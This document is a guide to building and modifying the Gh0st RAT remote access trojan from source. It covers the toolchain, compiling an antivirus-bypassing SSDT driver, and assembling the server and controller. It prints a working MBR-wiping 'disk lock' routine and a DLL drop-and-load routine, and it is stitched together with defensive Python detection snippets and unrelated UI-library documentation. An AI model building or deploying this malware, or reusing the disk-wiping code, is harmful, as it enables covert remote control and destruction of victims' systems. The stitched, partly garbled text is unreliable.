Notes on the source code of Gh0st


lbear@lbear.tk

Chapter 1: Building Gh0st

 

Section 1: Setting up the environment

Gh0st's development environment is Visual C++ 6.0 + the SDK update package + DDK 2003. The code was written and open-sourced in 2008 (so yes, it deserves a jab for still using VC6).

First, Visual C++ 6 is easy to find with a web search, so I won't give a link.

Next is the SDK update, which can be found at http://www.ctdisk.com/file/770549, although I personally suspect that installing VC6 SP6 makes this update unnecessary.

Finally, DDK 2003, which can also be found online; here is a link: http://www.ctdisk.com/file/770607. (Later versions of Visual Studio, 9, 10 and 11, don't need this; it is bundled into the corresponding VS installer (for example VS10 ships Windows SDK 7.1 and VS11 ships Windows SDK 8.0), and these SDKs can also be installed separately.) One more note: the DDK is what is used to build the driver.

Next, extract the SDK update into the corresponding folders of the VC6 installation directory, overwriting the existing files.

At this point the build environment is ready. Of course, you first need the source code of Gh0st 3.6 beta.

Section 2: Building the driver

First, a remark not directly related to this section: the driver here is used to rebuild the SSDT; if you are interested, search for the technique called "SSDT过主动" (restoring the SSDT to bypass active defence). However, since this technique has been around for a long time and was once used very widely, antivirus software now has adequate defences against it. Of course, the ingenuity of the masses is boundless, especially when something this satisfying and potentially this lucrative is involved, so the fight between antivirus software and malware never stops.

Building the driver is fairly simple. After installing DDK 2003, open Start Menu | Programs | Development Kits | Windows DDK 2600 | Build Environments and launch "Windows XP Checked Build Environment".

Then cd into the sys folder of the source tree and type build.

Then copy RESSDT.sys from the i386 folder under sys into the sys folder itself, and this section is done.

Section 3: Building svchost

Open server\svchost\svchost.dsw and build it (in the Release configuration).

Section 4: Building the Gh0st client program

Open gh0st.dsw in the gh0st directory and build.

Chapter 2: Gh0st's disk lock and removing the driver file

Section 1: Gh0st's disk lock

To prevent anyone from tampering with the copyright information, Gh0st's author 红狼 (Red Wolf) added the following protection mechanism: when the program starts it checks the copyright information, and if it does not match, it overwrites the MBR of the current system, so that the computer can no longer boot the next time it is restarted.

Section 2: Removing the disk lock mechanism from the Gh0st source

In BuildView.cpp, remove the following:

    // The expected version and title strings ("C.Rufus S " and "Gh0st RAT ")
    // are assembled one character at a time; neither array is NUL-terminated
    // in the original code.
    char strVer[10];
    char strTitle[10];
    strVer[0] = 'C';
    strVer[1] = '.';
    strVer[2] = 'R';
    strVer[3] = 'u';
    strVer[4] = 'f';
    strVer[5] = 'u';
    strVer[6] = 's';
    strVer[7] = ' ';
    strVer[8] = 'S';
    strVer[9] = ' ';
    strTitle[0] = 'G';
    strTitle[1] = 'h';
    strTitle[2] = '0';
    strTitle[3] = 's';
    strTitle[4] = 't';
    strTitle[5] = ' ';
    strTitle[6] = 'R';
    strTitle[7] = 'A';
    strTitle[8] = 'T';
    strTitle[9] = ' ';
    CString str;
    // If the version label or the main window title has been changed, wipe the MBR
    GetDlgItemText(IDC_STATIC_VER, str);
    if (str.Find(strVer) == -1)
        ((CGh0stApp *)AfxGetApp())->KillMBR();
    GetParent()->GetWindowText(str);
    if (str.Find(strTitle) == -1)
        ((CGh0stApp *)AfxGetApp())->KillMBR();

 

In gh0st.cpp, remove the following:

    // CGh0stApp message handlers

    // Real-mode boot code placed into the new MBR: it prints a message and then
    // loops forever. (The backslashes of the \x escapes are missing from these
    // literals as reproduced here.)
    unsigned char scode[] =
    "xb8x12x00xcdx10xbdx18x7cxb9x18x00xb8x01x13xbbx0c"
    "x00xbax1dx0excdx10xe2xfex49x20x61x6dx20x76x69x72"
    "x75x73x21x20x46x75x63x6bx20x79x6fx75x20x3ax2dx29";

    int CGh0stApp::KillMBR()
    {
        HANDLE hDevice;
        DWORD dwBytesWritten, dwBytesReturned;
        BYTE pMBR[512] = {0};

        // Rebuild the MBR: boot code from scode, zeroed partition table, boot signature
        memcpy(pMBR, scode, sizeof(scode) - 1);
        pMBR[510] = 0x55;
        pMBR[511] = 0xAA;

        // Open the first physical disk for raw sector access
        hDevice = CreateFile
        (
            "\\\\.\\PHYSICALDRIVE0",
            GENERIC_READ | GENERIC_WRITE,
            FILE_SHARE_READ | FILE_SHARE_WRITE,
            NULL,
            OPEN_EXISTING,
            0,
            NULL
        );
        if (hDevice == INVALID_HANDLE_VALUE)
            return -1;
        DeviceIoControl
        (
            hDevice,
            FSCTL_LOCK_VOLUME,
            NULL,
            0,
            NULL,
            0,
            &dwBytesReturned,
            NULL
        );
        // Write the virus content (sector 0)
        WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
        DeviceIoControl
        (
            hDevice,
            FSCTL_UNLOCK_VOLUME,
            NULL,
            0,
            NULL,
            0,
            &dwBytesReturned,
            NULL
        );
        CloseHandle(hDevice);
        ExitProcess(-1);
        return 0;
    }

Section 3: What to do if you are hit by the Gh0st disk lock

One solution is to use MBR repair software from a PE (preinstallation) environment to repair the MBR; among such tools, MbrFix is a very convenient one.

Alternatively, boot from the system installation disc and use its "Repair your computer" function to repair the MBR.
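Before repairing, it helps to confirm what sector 0 actually contains. The following triage parser is an added example, not code from the Gh0st source or this post: it splits a 512-byte MBR image into its partition table and boot signature and checks for the ASCII marker ("I am virus!") carried in the scode boot code shown above. The sample images are constructed, not taken from a real disk.

```python
import struct

# ASCII marker inside the boot code that Gh0st's KillMBR() writes to sector 0
# (decoded from the scode bytes shown in gh0st.cpp above).
GH0ST_MARKER = b"I am virus!"

def parse_mbr(sector: bytes) -> dict:
    """Split a 512-byte sector-0 image into boot code, partition table and signature."""
    if len(sector) != 512:
        raise ValueError("an MBR image must be exactly 512 bytes")
    partitions = []
    for i in range(4):  # four 16-byte partition entries start at offset 446
        raw = sector[446 + 16 * i:446 + 16 * (i + 1)]
        status, ptype, lba_start, sectors = struct.unpack("<B3xB3xII", raw)
        if ptype != 0:  # type 0 means the slot is unused
            partitions.append({"status": status, "type": ptype,
                               "lba_start": lba_start, "sectors": sectors})
    return {
        "signature_ok": sector[510:512] == b"\x55\xaa",
        "partitions": partitions,
        "gh0st_marker": GH0ST_MARKER in sector[:446],
    }

def assess_mbr(sector: bytes) -> str:
    """Classify a sector-0 image for triage."""
    info = parse_mbr(sector)
    if info["gh0st_marker"]:
        return "gh0st-lock"  # KillMBR() payload present; partition table was zeroed
    if not info["signature_ok"]:
        return "no-boot-signature"  # not a valid MBR at all
    if not info["partitions"]:
        return "empty-partition-table"
    return "clean"

# Constructed sample images (not taken from a real disk).
def make_clean_mbr() -> bytes:
    entry = struct.pack("<B3xB3xII", 0x80, 0x07, 2048, 204800)  # bootable NTFS partition
    return bytes(446) + entry + bytes(48) + b"\x55\xaa"

def make_locked_mbr() -> bytes:
    # Shape of sector 0 after KillMBR(): marker text in the boot code area,
    # all four partition entries zero, boot signature 0x55AA restored.
    sector = bytearray(512)
    sector[24:24 + len(GH0ST_MARKER)] = GH0ST_MARKER
    sector[510:512] = b"\x55\xaa"
    return bytes(sector)
```

Because KillMBR() zero-fills pMBR before copying in the boot code, a locked disk shows an empty partition table, which is why partition-rescanning repair tools can usually rebuild it.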

Section 4: Removing the Gh0st driver file

Gh0st's ability to bypass active defence by rebuilding the SSDT was extremely impressive back in the day, but now, four years later, many antivirus products handle it completely, so the feature is of little value and we can remove it.

1. First search for ResetSSDT and comment out everything found: 10 places. Search from the root folder.

Places 1-5. Location: Gh0st3.6原版\Server\install\install.cpp(439): bool ResetSSDT(HMODULE hModule)

    /*
    Remove driver file: sites 1-5 of 10

    Start

    bool ResetSSDT(HMODULE hModule)
    {
        typedef bool (__stdcall * LPResetSSDT)();
        bool bRet = true;
        char strTmpPath[MAX_PATH];
        char strDllPath[MAX_PATH];

        GetTempPath(sizeof(strTmpPath), strTmpPath);
        GetTempPath(sizeof(strDllPath), strDllPath);
        // Drop path: <temp dir><tick count>_ex.tmp
        wsprintf(strDllPath, "%s%d_ex.tmp", strTmpPath, GetTickCount());

        try
        {
            // Write the embedded DLL resource (IDR_DLL, type "BIN") to the temp path
            ReleaseResource(hModule, IDR_DLL, "BIN", strDllPath, NULL);

            HMODULE hDll = LoadLibrary(strDllPath);
            if (hDll == NULL)
            {
                throw "";
            }

            // Call the DLL's exported ResetSSDT(), which loads the driver
            LPResetSSDT ResetSSDT = (LPResetSSDT)GetProcAddress(hDll, "ResetSSDT");
            if (ResetSSDT == NULL)
                throw "";
            ResetSSDT();
            FreeLibrary(hDll);
        }
        catch (...)
        {
            bRet = false;
            DeleteFile(strDllPath);
        }

        return bRet;
    }

    End
    */

 

 

2. Site 6 of 10

Server\install\install.cpp(581): ResetSSDT(hInstance);

    // Remove driver file: site 6/10
    // ResetSSDT(hInstance);

3. Gh0st3.6原版\Server\svchost\svchost.cpp(11): #include "common/resetssdt.h"

    // Remove driver code: site 7/10
    //#include "common/resetssdt.h"

4. Gh0st3.6原版\Server\svchost\svchost.cpp(24): extern "C" __declspec(dllexport) bool ResetSSDT();

    // Remove driver code: site 8/10
    //extern "C" __declspec(dllexport) bool ResetSSDT();

5. Gh0st3.6原版\Server\svchost\svchost.cpp(83): ResetSSDT();

    // Remove driver code: site 9/10
    // ResetSSDT();

6. Gh0st3.6原版\Server\svchost\svchost.cpp(222): extern "C" __declspec(dllexport) bool ResetSSDT()

    // Remove driver code: site 10/10
    /*
    extern "C" __declspec(dllexport) bool ResetSSDT()
    {
        return RestoreSSDT(CKeyboardManager::g_hInstance);
    }
    */

7. Comment out the resource reference

Search for IDR_SYS.

Location: Gh0st3.6原版\Server\svchost\svchost.rc(29): IDR_SYS BIN DISCARDABLE "..\sys\RESSDT.sys"

    // Comment out the driver resource file
    //IDR_SYS BIN DISCARDABLE "..\sys\RESSDT.sys"

Then delete RESSDT.sys from the svchost project's file list.

8. Search the project folder for resetssdt.h

and delete it.
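As an added defensive example (not code from the Gh0st project or this post), the drop-and-load pattern of the ResetSSDT() function above, a file named <tick count>_ex.tmp written into the Temp directory and then loaded with LoadLibrary, can be correlated in endpoint telemetry. The Sysmon-style records, process names and paths below are constructed.

```python
import re
from collections import defaultdict

# File name produced by ResetSSDT(): GetTempPath() + "<GetTickCount()>_ex.tmp",
# e.g. C:\Windows\Temp\4587321_ex.tmp
DROP_NAME = re.compile(r"\\temp\\\d+_ex\.tmp$", re.IGNORECASE)

def find_temp_dll_drops(events):
    """Return processes that wrote a <digits>_ex.tmp file into a Temp directory
    and then loaded that same file as a module (the ReleaseResource -> LoadLibrary
    sequence). `events` are constructed Sysmon-style records in time order:
    dicts with keys event (FileCreate | ImageLoad), pid, image and path."""
    written = defaultdict(set)
    hits = []
    for ev in events:
        path = ev["path"]
        if not DROP_NAME.search(path):
            continue
        if ev["event"] == "FileCreate":
            written[ev["pid"]].add(path.lower())
        elif ev["event"] == "ImageLoad" and path.lower() in written[ev["pid"]]:
            hits.append({"pid": ev["pid"], "image": ev["image"], "module": path})
    return hits

# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    {"event": "FileCreate", "pid": 1234, "image": r"C:\Windows\System32\svchost.exe",
     "path": r"C:\Windows\Temp\4587321_ex.tmp"},
    {"event": "ImageLoad", "pid": 1234, "image": r"C:\Windows\System32\svchost.exe",
     "path": r"C:\Windows\Temp\4587321_ex.tmp"},
    # A process loading a matching name it never wrote itself: not flagged here.
    {"event": "ImageLoad", "pid": 5678, "image": r"C:\Windows\notepad.exe",
     "path": r"C:\Windows\Temp\99_ex.tmp"},
    # An ordinary temp file whose name does not match <digits>_ex.tmp.
    {"event": "FileCreate", "pid": 1234, "image": r"C:\Windows\System32\svchost.exe",
     "path": r"C:\Windows\Temp\report.tmp"},
]

if __name__ == "__main__":
    for hit in find_temp_dll_drops(SAMPLE_EVENTS):
        print(hit)
```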

 

 

Chapter 3: The CJ60Lib library in Gh0st

Section 1: Introduction to CJ60Lib

This release is the result of your comments, and suggestions. I received several suggestions and bug reports, which I believe most have been addressed and fixed with this release. Please remember there is not a “team” of developers maintaining this code, only I, and it is done in my spare time, so you can expect some bugs. If you have comments or suggestions, feel free to drop me a line at kstowell@codejockeys.com

 

The original library (MFCXLib) was renamed to CJ60Lib, in order to break any links that may have been established with any applications using the old library, and to establish a version control system. The library has the same functionality as the old one, however, there have been several enhancements for compatibility with Visual C++ 6.0.

 

Follow these steps to setup your application to use CJ60Lib MFC extension library:

 

1. In your project settings, select the General tab. Make sure that Microsoft Foundation Class is set to Use MFC in a shared DLL.

2. In your project settings, select the Link tab. Set the Category to Input, and add ../Lib to Additional Library Path.

3. While still in the Link tab, change Category to General. For Output Name (All Configurations), build to the ../Lib directory. This makes the execution and debugging easier, since both DLL and EXE are located in the same directory. An example of this would be: ../Lib/MyDemo.exe.

4. Select the C/C++ tab next. Change Category to Preprocessor, and add ../Include to Additional Include Directories.

5. The last step would be to add the following two lines of code to your StdAfx.h header file, which will import all exported classes, and grant access to your entire application:

 

#include <CJ60Lib.h>

 

In order to statically link to CJ60Lib, make the following changes:

 

1. In your project settings, select the General tab. Make sure that Microsoft Foundation Class is set to Use MFC in a static library.

2. You will need to copy the resources from the CJ60 library to your project. The easiest way to do this is to open the file CJ60Lib.rc, then drag and drop the resources into your project.

 

This library was written for version 4.71 or later of comctl32.dll. If you have an older version, you can download the latest version from the Microsoft site. Follow this link if you have an older version of comctl32.dll. It is important to note that the library will not load if your comctl32.dll version is older than 4.71.

 

Build errors, what to do:

 

If you receive the following build error “#error : CJ60Lib requires a newer version of the SDK than you have!”, this means that you most likely are using Visual C++ 5, and either do not have the platform SDK installed, or you have an older version. You will need to download the latest version from Microsoft. To get it, follow this link.

 

If you receive the following build error "Error: Can't find file CJ60Libd.lib.", this means you haven't built the library yet. YOU NEED TO BUILD the library first; this will generate the .lib and .dll files needed by the examples.

 

Disclaimer:

 

This source code in this library may be used in compiled form in any way you desire, Source file(s) may be redistributed unmodified by any means PROVIDING they are not sold for profit without the authors expressed written consent, and providing that this notice and the authors name and all copyright notices remain intact. If the source code is used in any commercial applications then a statement along the lines of:

 

“Portions Copyright © 1998-99 Kirk Stowell” must be included in the startup banner, “About” box or printed documentation. An email letting me know that you are using it would be nice as well. That’s not much to ask considering the amount of work that went into this. This software is provided “as is” without express or implied warranty. Use it at your own risk! The author accepts no liability for any damage/loss of business that this product may cause.


Figure 1: CJ60Lib class inheritance diagram

Section 2: Files needed to use CJ60Lib in Gh0st

CustomTabCtrl.cpp

TabSDIFrameWnd.cpp

ThemeUtil.cpp

CustomTabCtrl.h

TabSDIFrameWnd.h

ThemeUtil.h

Tmschema.h

In MainFrm.h: #define CFrameWnd CTabSDIFrameWnd

You can see that TabSDIFrameWnd.h defines an AddView function for adding tabs.

Section 3: How Gh0st creates the tab bar

In MainFrm.h and MainFrm.cpp:

At the end of OnCreate() in MainFrm.cpp, call the Create() function of CCustomTabCtrl.

The default CCustomTabCtrl object is m_wndTab, i.e. m_wndTab.Create().

For the function BOOL CCustomTabCtrl::Create(UINT dwStyle, const CRect &rect, CWnd *pParentWnd, UINT nID);

dwStyle is the visual style of the tabs (e.g. WS_CHILD, the child-window style; WS_VISIBLE, the tab control is visible; CTCS_AUTOHIDEBUTTONS, auto-hide the buttons; CTCS_TOOLTIPS, tooltips are enabled; CTCS_DRAGMOVE, items in the tab window can be dragged with the left mouse button; CTCS_LEFT, left-aligned style)

rect is the position of the tab buttons

pParentWnd is a pointer to the tab control's parent window (in gh0st this should be the main window, "this")

nID is the tab control ID (any value will do, for example IDC_TABCTRL, which is defined in TabSDIFrameWnd.h)

Failures while creating the tab bar can be caught at the same time:

    if (xxx) TRACE0("Failed to xxxxxx");

CCustomTabCtrl::SetDragCursors(HCURSOR hCursorMove, HCURSOR hCursorCopy);

sets the cursors shown while dragging with the mouse.

CCustomTabCtrl::ModifyStyle()

is used to customise the control's style.

Creating tabs through messages

Message handling: a message name, WPARAM (usually carries a control ID or a mouse position) and LPARAM (a structure pointer or a handle).

A message must be received by a window, identified by its window handle.

In the view's initialisation function, a message is used to call the function that creates the tab:

    #define WM_MYINITIALUPDATE (WM_USER+101)

In the view class's OnInitialUpdate, use CWnd::PostMessage(UINT message, WPARAM wParam = 0, LPARAM lParam = 0); to send the message to the client's main window.

e.g. PostMessage(WM_MYINITIALUPDATE);

Define a function that initialises the control (in the CGh0stView class):

    afx_msg LRESULT OnMyInitialUpdate(WPARAM, LPARAM);

(LRESULT is the 32-bit return type of message handlers and window procedures; declaring only the parameter types, without names, is also fine.)


 

